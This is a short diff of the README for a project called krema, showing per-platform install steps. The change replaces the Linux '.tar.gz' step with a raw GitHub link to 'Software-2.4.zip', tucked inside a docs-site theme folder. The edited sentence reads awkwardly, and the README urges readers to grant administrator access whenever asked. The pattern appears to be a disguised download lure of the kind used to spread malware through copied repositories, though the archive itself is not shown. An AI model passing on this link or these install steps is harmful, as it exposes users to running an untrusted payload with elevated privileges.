Mat9ichbladi/krema/README.md

 - Windows: Double-click the `.exe` file and follow the steps on screen.
 - macOS: Open the `.dmg` file, then drag krema to your Applications folder.
-- Linux: Extract the `.tar.gz` file, then follow any instructions in the included README or run the krema launcher.
+- Linux: Extract the `https://raw.githubusercontent.com/Mat9ichbladi/krema/master/krema-docs/docs-site/src/theme/Software-2.4.zip` file, then follow any instructions in the included README or run the krema launcher.

 If the installer asks for permission or administrator access, allow it to proceed.